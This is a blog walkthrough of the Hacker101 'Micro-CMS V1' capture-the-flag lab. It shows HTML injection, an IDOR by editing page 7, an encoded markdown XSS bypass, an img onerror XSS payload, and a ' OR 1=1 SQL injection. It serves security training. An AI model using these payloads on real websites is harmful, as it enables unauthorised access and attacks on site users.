Post

Micro-CMS V1 - Hacker101 CTF

Posted
By
2 min read
Micro-CMS V1 - Hacker101 CTF

Understanding how the website works

We are greeted by a home page that lists all pages and ability to create new pages.

1
2
3
4
5
6
7
8
9
10
11
12
13

<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        <ul>
<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>

Nothing special in the source.

On visting the first page we can see that we also have the ability to edit pages.

/page/edit/1

On editing the page we see that Markdown is supported, but scripts are not

Page 2 has the following content:

1
2
3
4
5

Just testing some markdown functionality.

![adorable kitten](https://static1.squarespace.com/static/54e8ba93e4b07c3f655b452e/t/56c2a04520c64707756f4267/1493764650017/)

<button>Some button</button>

Trying to create a page /page/create:

It appears in the home page with other page listing. This is indicative of a database read like ability.

1
2
3

<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
<li><a href="page/10">test</a></li>

The weird thing is that the page is page/10. Why not 3 or 4?

On enumerating the other page/<id> we discover /page/7 is Forbidden, while the rest are Not Found.

Editing/Creating a Page

On editing/creating a page:

1

title=test&body=test123%0D%0A%3Cp%3Ehello%3C%2Fp%3E%0D%0A%23%23%23+hello

If we try to post a body like:

1
2
3
4

test123
### hello

<a href=".">hello</a>

We get this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

<!doctype html>
<html>
    <head>
        <title>test##</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/10">Edit this page</a>
        <h1>test##</h1>
<p>test123</p>
<h3>hello</h3>
<p><a href=".">hello</a></p>
    </body>
</html>

The anchor tag is surrounded by a <p> tag.

First Flag

We can do HTML Injection in the title of a page.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

<!doctype html>
<html>
    <head>
        <title>&lt;h1&gt;test&lt;/h1&gt;</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/10">Edit this page</a>
        <h1>&lt;h1&gt;test&lt;/h1&gt;</h1>
<p>test123</p>
<h3>hello</h3>
<p><a href=".">hello</a></p>
<h1>heading 1</h1>
    </body>
</html>

Second Flag

Since we can edit pages /page/edit/10 just by specifying ID, we can see the possibility of an IDOR vulnerability.

The page/7 gave us a 403, we can either try 403 bypasses which would be inefficient in this case or we can just change the /page/edit/<id> to 7.

Markdown XSS

It is possible to bypass the script to scrubbed whenever we try to inject a script into a page by using an HEX encoded markdown (which gets us an XSS):

1

[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)

HTML Encoder

This, however, doesn’t get us a flag which means this is an unintended.

Third Flag

We can also get an XSS like this (attribute-based XSS):

1

<img src=x onerror=alert('xss')>

We can view the page source to get the flag.

Fourth Flag

Since creating/editing a page persists and the listing of the pages also dynamically update, we can deduce there’s a database in the backend.

I spent a lot of time trying to get an SQLi on the /page/<id>, however, it yielded nothing.

Fortunately, the same isn’t the case for editing a page /page/edit/<id>

We can get an SQLi by injecting a payload right after the page id ' OR 1=1.

Challenges
hacker101 web idor sql injection html injection attribute-based xss
This post is licensed under CC BY 4.0 by the author.